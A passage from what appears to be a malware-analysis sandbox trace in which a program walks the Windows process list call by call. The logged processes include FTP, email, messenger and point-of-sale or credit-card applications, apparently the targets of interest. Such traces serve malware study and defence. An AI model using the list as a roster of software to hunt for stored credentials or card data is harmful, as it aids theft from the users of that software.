dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.216] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0223.247] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.250] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0223.254] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0223.256] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0223.259] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0223.261] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.264] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0223.266] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.269] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.270] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0223.272] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.274] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.276] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.278] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.280] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0223.290] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0223.292] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0223.294] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0223.296] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0223.298] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0223.300] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0223.302] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0223.304] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0223.306] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0223.308] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0223.310] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0223.311] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0223.313] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0223.315] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0223.317] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0223.319] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0223.321] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0223.322] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0223.329] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0223.331] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0223.336] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0223.340] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0223.342] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0223.346] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0223.349] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0223.352] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0223.355] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0223.358] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0223.362] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0223.365] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0223.383] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0223.387] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0223.389] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0223.392] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0223.395] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0223.398] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0223.400] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0223.403] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0223.406] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0223.409] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0223.412] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0223.415] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0223.417] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0223.430] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0223.434] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0223.438] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0223.440] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0223.442] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0223.444] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0223.447] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0223.450] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0223.452] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0223.453] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0223.455] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0223.457] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0223.459] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0223.461] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0223.463] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0223.465] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0223.467] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0223.484] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0223.486] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0223.489] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0223.491] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.493] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.495] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0223.497] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.499] Process32Next (in: hSnapshot=0x14ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0223.502] CloseHandle (hObject=0x14ac) returned 